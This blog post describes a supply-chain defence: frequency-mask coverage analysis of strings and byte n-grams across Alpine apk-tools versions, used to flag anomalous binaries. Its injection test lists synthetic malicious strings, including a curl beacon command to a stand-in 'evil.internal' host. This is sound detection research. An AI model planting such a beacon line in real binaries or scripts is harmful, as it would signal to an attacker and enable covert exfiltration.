Detecting anomalous binaries by measuring drift from their own version history | Lisandro Fernández Rocha


Published: March 06, 2026
awk, binary-analysis, software-integrity, supply-chain-security, concatenative-synthesis, masking, binary-inspection, static-analysis, frequency-analysis, anomaly-detection, unix

Frequency masking on embedded binary strings

Can a binary be evaluated against the statistical structure of its own version history?

Verifying the integrity of distributed binaries usually depends on reproducible builds or vendor signatures. In practice, both assumptions often fail: many projects do not provide reproducible builds, and closed binaries cannot be rebuilt independently. When a suspicious binary appears, the only options are usually signature matching or full reverse engineering.

This post shows a simple experiment using nine versions of Alpine’s apk binary.

Detecting binary drift with frequency masks

The method builds a frequency mask of invariant strings across a corpus of known-good versions and measures how much of that invariant structure a target binary still covers.

Alpine apk-tools coverage (unigram & byte n-gram)

Unit          3.14–3.22  3.23 (outlier)
Strings       71–80%     40%
Byte n-grams  23–28%     13.6%

This is an extension of a method developed in “Me gustan las listas”, where frequency masks were applied to text corpora to remove boilerplate.

The post covers two analyses. The first treats each line of strings output as a unit (unigram). The second operates on the continuous printable byte sequence of the binary, with no line cuts, using a sliding window to extract character n-grams. Both use the same frequency mask construction and coverage measurement. Raff et al. (2018) observed, in a different context, that most information carried by byte n-grams is recoverable from string features alone. The two analyses here are designed around that complementarity.

A note on the synthesis traditions that informed the framing: granular synthesis decomposes a signal into small time-domain grains and analyzes each individually. Concatenative synthesis extends that to the transitions between grains, because the join carries information that neither grain contains alone. Ó Nuanáin, Herrera and Jordà describe this distinction precisely in the context of rhythmic pattern generation (ISMIR 2016). Applied here: the string is the grain in the first analysis. The byte sequence with a sliding window is the concatenative extension: no arbitrary cuts. The grain becomes a fixed-width window over the continuous character sequence.

A parenthesis as grateful attribution: Sergi Jordà presented this distinction at “Creación Musical Interactiva: del Reactable a las redes musicales,” Centro Cultural de España en Buenos Aires, 2009. The idea that concatenative synthesis considers the join between grains, not only the grains themselves, came from that room.


The observation

Every compiled binary carries embedded strings: error messages, format strings, symbol names, library paths, command-line option descriptions. These strings are largely stable across patch releases. The error messages in apk-tools 2.14.4 are the same as in apk-tools 2.14.9. The option descriptions did not change.

Version identifiers and build timestamps do change, but they are a small fraction of the total string population.

Given a corpus of known-good versions of the same binary, most strings appear in most versions. A binary with an anomalous string population is worth investigating.
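That claim is easy to spot-check with comm over sorted strings output. A runnable sketch, using invented stand-ins for two versions' string lists (only the version string differs between them):

```shell
# Stand-ins for `strings` output from two patch releases (contents invented)
cd "$(mktemp -d)"
printf 'usage: apk add\nERROR: %%s\nv2.14.4\n' > v1.txt
printf 'usage: apk add\nERROR: %%s\nv2.14.9\n' > v2.txt

sort -u v1.txt > v1.sorted
sort -u v2.txt > v2.sorted

# comm -12 keeps only lines present in both files
shared=$(comm -12 v1.sorted v2.sorted | grep -c '')
total=$(grep -c '' v1.sorted)
echo "$shared/$total strings shared"
```

Two of the three strings survive across the pair; only the version identifier drifts.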


Corpus: Alpine apk-tools from release ISOs

The corpus is sbin/apk extracted directly from Alpine Linux release ISOs, 3.14 through 3.22. Each ISO ships apk-tools as a .apk package in /apks/x86_64/. The package is a gzip tar. No installation required.

mount -o loop,ro isos/alpine-standard-3.22.0-x86_64.iso mnt/3.22

tar -xzf mnt/3.22/apks/x86_64/apk-tools-2.14.9-r2.apk \
    --to-stdout sbin/apk > binaries/apk-tools/apk-tools-3.22

strings binaries/apk-tools/apk-tools-3.22 > strings/apk-tools/3.22.txt

Alpine  apk-tools   size    strings
3.14    2.12.5-r1   69712B  746
3.15    2.12.7-r3   69768B  749
3.16    2.12.9-r3   69624B  755
3.17    2.12.10-r1  69560B  756
3.18    2.14.0-r0   69632B  846
3.19    2.14.0-r5   69648B  843
3.20    2.14.4-r0   69648B  827
3.21    2.14.6-r2   69648B  864
3.22    2.14.9-r2   69648B  856

Binary sizes cluster around 69.6KB through the 2.12.x and 2.14.x series. All 9 binaries have distinct SHA256 hashes.

Alpine 3.23 ships apk-tools 3.0.1, a rewrite. Its binary is 115096B.


Automatic corpus boundary detection

Before building the mask, binary sizes are compared against the corpus median. Any binary that deviates more than 20% from the median is excluded from mask construction and evaluated separately.

count=${#VERSIONS[@]}                 # number of corpus binaries
sorted_sizes=$(for ver in "${VERSIONS[@]}"; do echo "${SIZES[$ver]}"; done | sort -n)
mid=$(( (count + 1) / 2 ))            # index of the median element
median=$(echo "$sorted_sizes" | sed -n "${mid}p")
lo=$(echo "scale=0; $median * 80 / 100" | bc)   # accept down to 80% of median
hi=$(echo "scale=0; $median * 120 / 100" | bc)  # and up to 120%
median: 69648B       range: 55718B - 83577B

3.14 - 3.22  [corpus]     69560B - 69768B
3.23         [outlier]    115096B  (65% above median)

The 3.23 rewrite is detected automatically. No version numbers are hardcoded. The PACKAGE variable at the top of the script is the only thing that changes when applying this to a different binary.


Building the frequency mask

For each unit of analysis, count how many distinct files in the corpus contain it. Units present in at least threshold fraction of the corpus become the mask.

The key distinction: count by distinct file, not by total occurrences. A string that appears 50 times in one binary contributes 1 to the frequency count. A string that appears once in 7 of 9 corpus files contributes 7.

The mask is built in a single awk pass over all corpus files:

FNR == 1 { delete seen }              # new corpus file: reset the per-file set
{
    if (seen[$0]) next                # each string counts once per file
    seen[$0] = 1
    freq[$0]++
}
END {
    for (s in freq)
        if (freq[s] >= min) print s   # min: minimum number of files required
}

FNR == 1 resets the per-file deduplication set at each new file. The full corpus of 9 files processes in under 0.25 seconds.
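A hypothetical driver for that pass, deriving min from the 0.75 threshold with integer ceiling arithmetic (the three corpus files here are toy stand-ins, not real strings output):

```shell
cd "$(mktemp -d)"
printf 'alpha\nbeta\nbeta\n' > f1.txt   # duplicate beta still counts once
printf 'alpha\ngamma\n'      > f2.txt
printf 'alpha\nbeta\n'       > f3.txt

n=3                                     # corpus size
min=$(( (n * 75 + 99) / 100 ))          # ceil(0.75 * n) = 3

awk -v min="$min" '
FNR == 1 { delete seen }
{ if (seen[$0]) next; seen[$0] = 1; freq[$0]++ }
END { for (s in freq) if (freq[s] >= min) print s }
' f1.txt f2.txt f3.txt > mask.txt
cat mask.txt
```

beta appears in two of three files (0.67 < 0.75) and is dropped; only alpha makes the mask.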


Analysis 1: unigram coverage

At threshold 0.75, the mask contains 513 strings.

Alpine  apk-tools   covered/total  coverage
3.14    2.12.5-r1   574/746        76.9%
3.15    2.12.7-r3   580/749        77.4%
3.16    2.12.9-r3   581/755        76.9%
3.17    2.12.10-r1  611/756        80.8%
3.18    2.14.0-r0   627/846        74.1%
3.19    2.14.0-r5   634/843        75.2%
3.20    2.14.4-r0   623/827        75.3%
3.21    2.14.6-r2   617/864        71.4%
3.22    2.14.9-r2   617/856        72.0%

Corpus coverage: 71% to 80%.

Alpine  apk-tools  covered/total  coverage
3.23    3.0.1-r1   532/1317       40.3%   (outlier, major version rewrite)

[Figure: unigram coverage]
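The coverage measurement itself is not listed in the post; a minimal reconstruction in the same awk style, assuming the mask and the target's strings output are plain text files (toy contents below):

```shell
cd "$(mktemp -d)"
printf 'alpha\nbeta\n'        > mask.txt    # toy mask
printf 'alpha\nbeta\ndelta\n' > target.txt  # toy target strings

awk '
NR == FNR { mask[$0] = 1; next }            # first file: load the mask
!seen[$0]++ {                               # distinct target strings only
    total++
    if ($0 in mask) covered++
}
END { printf "%d/%d (%.1f%%)\n", covered, total, 100 * covered / total }
' mask.txt target.txt
```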

How the sliding window works

A binary file is a stream of bytes. Each byte is one value between 0 and 255, written in hex as two digits: 00 to FF.

Take two known-good versions as corpus:

corpus 1: "hello world"
corpus 2: "hello words"

pos:  1   2   3   4   5   6   7   8   9  10  11
chr:  h   e   l   l   o       w   o   r   l   d
hex: 68  65  6C  6C  6F  20  77  6F  72  6C  64

chr:  h   e   l   l   o       w   o   r   d   s
hex: 68  65  6C  6C  6F  20  77  6F  72  64  73

A window of grain=4 step=1 moves like this. Each window produces one n-gram. No byte determines a cut. The window moves forward by 1 and reads 4.

W1: [h  e  l  l]   68 65 6C 6C   corpus1 ✓  corpus2 ✓
W2: [e  l  l  o]   65 6C 6C 6F   corpus1 ✓  corpus2 ✓
W3: [l  l  o   ]   6C 6C 6F 20   corpus1 ✓  corpus2 ✓
W4: [l  o     w]   6C 6F 20 77   corpus1 ✓  corpus2 ✓
W5: [o     w  o]   6F 20 77 6F   corpus1 ✓  corpus2 ✓
W6: [   w  o  r]   20 77 6F 72   corpus1 ✓  corpus2 ✓
W7: [w  o  r  l]   77 6F 72 6C   corpus1 ✓  corpus2 ✗
W8: [o  r  l  d]   6F 72 6C 64   corpus1 ✓  corpus2 ✗

At threshold=0.75, W7 and W8 do not make it into the mask. They appeared in only one of two documents.
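The windows above can be generated mechanically with the same awk used later in the post, run here over the first corpus string:

```shell
printf 'hello world' | awk -v grain=4 -v step=1 '
{ seq = seq $0 }
END {
    n = length(seq)
    for (i = 1; i + grain - 1 <= n; i += step)
        print substr(seq, i, grain)       # W1 "hell" through W8 "orld"
}'
```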

Three targets against this mask:

"hello words" — known subject, can pass:

                   "hello world"      "hello words"
W1: [h  e  l  l]   68 65 6C 6C   ✓   68 65 6C 6C   ✓
W2: [e  l  l  o]   65 6C 6C 6F   ✓   65 6C 6C 6F   ✓
W3: [l  l  o   ]   6C 6C 6F 20   ✓   6C 6C 6F 20   ✓
W4: [l  o     w]   6C 6F 20 77   ✓   6C 6F 20 77   ✓
W5: [o     w  o]   6F 20 77 6F   ✓   6F 20 77 6F   ✓
W6: [   w  o  r]   20 77 6F 72   ✓   20 77 6F 72   ✓
W7: [w  o  r  d]   77 6F 72 6C   ✗   77 6F 72 64   ✗
W8: [o  r  d  s]   6F 72 6C 64   ✗   6F 72 64 73   ✗

Coverage: 6/8 = 75%. W7 and W8 differ between the two corpus documents. The threshold dropped them from the mask. The greeting passes.

"hello earth" — second word different:

W1: [h  e  l  l]   68 65 6C 6C   ✓
W2: [e  l  l  o]   65 6C 6C 6F   ✓
W3: [l  l  o   ]   6C 6C 6F 20   ✓
W4: [l  o     e]   6C 6F 20 65   ✗
W5: [o     e  a]   6F 20 65 61   ✗
W6: [   e  a  r]   20 65 61 72   ✗
W7: [e  a  r  t]   65 61 72 74   ✗
W8: [a  r  t  h]   61 72 74 68   ✗

Coverage: 3/8 = 37%. W4 is the first window to include a changed byte. The five remaining windows each overlap the altered region and fail. W1 through W3 pass because the change lies outside their range.

The mask:

[h  e  l  l]   68 65 6C 6C   "hell"
[e  l  l  o]   65 6C 6C 6F   "ello"
[l  l  o   ]   6C 6C 6F 20   "llo "
[l  o     w]   6C 6F 20 77   "lo w"
[o     w  o]   6F 20 77 6F   "o wo"
[   w  o  r]   20 77 6F 72   " wor"

Six sequences. Every document that starts with hello w covers the first four windows before anything else matters. The mask does not know it is detecting greetings. It knows those six byte patterns were present in every document it was given.

"bye bye now" — completely different:

W1: [b  y  e   ]   62 79 65 20   ✗
W2: [y  e     b]   79 65 20 62   ✗
W3: [e     b  y]   65 20 62 79   ✗
W4: [   b  y  e]   20 62 79 65   ✗
W5: [b  y  e   ]   62 79 65 20   ✗
W6: [y  e     n]   79 65 20 6E   ✗
W7: [e     n  o]   65 20 6E 6F   ✗
W8: [   n  o  w]   20 6E 6F 77   ✗

Coverage: 0/8 = 0%. None of these sequences were in the corpus.


Analysis 2: byte n-gram coverage

The unigram analysis treats each line of strings output as a unit. That cut is a null byte in the binary. There is no semantic significance to that boundary.

The byte n-gram analysis removes that cut entirely. The binary is read as a continuous sequence of printable bytes and a sliding window extracts fixed-width character n-grams:

tr -cd '\040-\176' < binary | awk -v grain="$GRAIN" -v step="$STEP" '
{ seq = seq $0 }                      # accumulate the printable byte stream
END {
    n = length(seq)
    for (i = 1; i + grain - 1 <= n; i += step)
        print substr(seq, i, grain)   # one fixed-width n-gram per window
}'

No strings, no line cuts, no dependency on null byte positions. The same frequency mask construction runs on the resulting n-gram files.

Each binary has approximately 19,000-21,000 printable characters in the 2.x series. Alpine 3.23 has 33,680.
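That count is simply the length of the filtered stream. A toy check of the same tr filter, with an invented input containing a NUL and a newline (both outside \040-\176 and therefore dropped):

```shell
# "hi" + "there" + "!" survive the filter: 8 printable bytes
printf 'hi\0there\n!' | tr -cd '\040-\176' | wc -c
```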

grain=6 step=2

Mask contains 2253 n-grams.

Alpine  apk-tools   covered/total  coverage
3.14    2.12.5-r1   2319/9770      23.7%
3.15    2.12.7-r3   2716/9844      27.5%
3.16    2.12.9-r3   2457/9852      24.9%
3.17    2.12.10-r1  2557/10004     25.5%
3.18    2.14.0-r0   2556/10783     23.7%
3.19    2.14.0-r5   2793/10499     26.6%
3.20    2.14.4-r0   2805/10579     26.5%
3.21    2.14.6-r2   2703/10708     25.2%
3.22    2.14.9-r2   2970/10687     27.7%

Outlier: 3.23: 2293/16838 (13.6%)

Corpus range 23.7-27.7%, outlier 13.6%. The separation is cleaner. The grain size and step are parameters that trade mask density for specificity. A larger corpus would allow larger grains without losing separation.

[Figure: byte n-gram coverage]

Injection test

The injection test appends synthetic strings to apk-tools-3.22 and measures unigram coverage against the mask.

Baseline: 617/856 (72.0%)

injected  total  covered  coverage  delta
+1        857    617      71.9%     -0.1%
+5        861    617      71.6%     -0.4%
+10       866    617      71.2%     -0.8%
+20       876    617      70.4%     -1.6%
+50       906    617      68.1%     -3.9%

Sample strings flagged as new:

> PWNED_BY_SUPPLIER_X
> backdoor.collection.exfil
> curl http://evil.internal/beacon

Coverage decreases monotonically. The covered count does not change: the injected strings are absent from the mask and the known strings remain known.


Properties

No reproducibility requirement. The mask is built from observed populations in version history. Two builds of the same source with different timestamps produce nearly identical string populations. Both score near the corpus baseline.

Closed binaries. The analysis requires only read access to the binary. No source, no debug symbols, no build metadata.

No prior signature. The corpus is built from version history available without authentication: public package repositories, OCI registries, release ISOs. No PKI, no key management.

Proportional signal. Coverage is a continuous metric. The alert threshold is inferred from the observed distribution of known-good versions.

Two complementary signals. Unigram coverage detects new strings. Byte n-gram coverage operates on the raw character sequence without depending on tool-imposed cuts.


Limitations

The analysis detects string population anomalies, not arbitrary code modifications. A modification that reuses existing strings in existing positions will not change either metric.

The corpus must be known-good. A change present in all corpus versions becomes part of the mask. The method assumes the corpus is clean.

strings output and tr output depend on tool configuration. Minimum length, encoding and platform affect results. The corpus and target must be processed identically.

Grain size and corpus size are coupled. A grain of 8 characters requires a larger corpus to produce a stable mask than a grain of 6. With 9 versions, grain=6 step=2 produces better separation than grain=8 step=4.


Where this fits if the pipeline is already signed

A signature certifies that a specific process signed a specific artifact. It does not certify that the artifact is semantically consistent with prior versions of itself. A build step that modifies a binary after compilation and before signing produces a valid signature on a modified artifact.

Coverage analysis answers a different question: is this artifact what it has always been? The two signals are orthogonal. Signature verification is a gate. Coverage analysis is a baseline. Gates are binary. Baselines are continuous.


Coverage as a time series

A single coverage measurement detects whether a specific version is anomalous. A time series detects whether the binary is drifting.

This is the natural shape for a build pipeline dashboard: every release of a dependency plotted as a point, drift visible as slope before any single artifact crosses an alert threshold.

A binary that loses 0.5% coverage per release over ten releases triggers no per-artifact alert. The cumulative drop is visible as slope on a chart.
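A toy rendering of that scenario, assuming a flat 0.5% loss per release from the 72.0% baseline of 3.22:

```shell
awk 'BEGIN {
    cov = 72.0                               # starting coverage
    for (r = 1; r <= 10; r++) {
        cov -= 0.5                           # small, sub-threshold drop
        printf "release %2d  %.1f%%\n", r, cov
    }
}'
```

No single step looks alarming; the endpoint at 67.0% does.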

A second derived metric is mask variance: how much the mask itself changes when rebuilt with a sliding window corpus. A stable binary produces a stable mask. A mask that gains or loses many entries between consecutive rebuilds signals that the population is in flux. Coverage measures the target. Mask variance measures the baseline.


When this is useful

This method is not meant to replace reproducible builds, signatures, or deep binary analysis. Instead, it works as a lightweight anomaly detector that can help identify binaries worth closer inspection.

Some practical situations where this approach can be useful:

Screening deliveries from opaque providers before deployment. When a vendor delivers updated binaries on a regular cadence without source access or build transparency, the version history of those deliveries becomes the corpus. Each new delivery is measured against the mask built from previous ones. A provider whose binaries have been consistent for twelve releases and then shift significantly on the thirteenth is worth a conversation before deployment.

Validating binaries from untrusted mirrors. When software is downloaded from unofficial mirrors or secondary distribution channels, a quick frequency mask check can indicate whether the binary statistically resembles known-good releases.

Quick triage before reverse engineering. Before investing time in full static analysis or reverse engineering, this method can provide a fast signal about whether a binary deviates significantly from the structure of previous versions.

Monitoring dependency drift across releases. By maintaining a corpus of historical binaries, it becomes possible to track structural drift between releases and detect unusual changes that may indicate build process alterations, toolchain changes, or potential supply-chain issues.


Reproducible builds try to prove that two binaries are identical.

This experiment takes a different direction: measuring how far a binary deviates from the statistical structure of its own release history. In many practical cases, detecting drift is already enough to justify deeper inspection.

In practice, this method provides a fast, low-overhead signal to flag unusual changes or potential tampering in binaries without needing source access, reproducible builds, or signatures. By tracking how structure shifts between releases, maintainers and security teams can quickly prioritize and inspect anomalous artifacts, complementing existing verification methods with a continuous, proportional metric rather than a simple pass/fail check.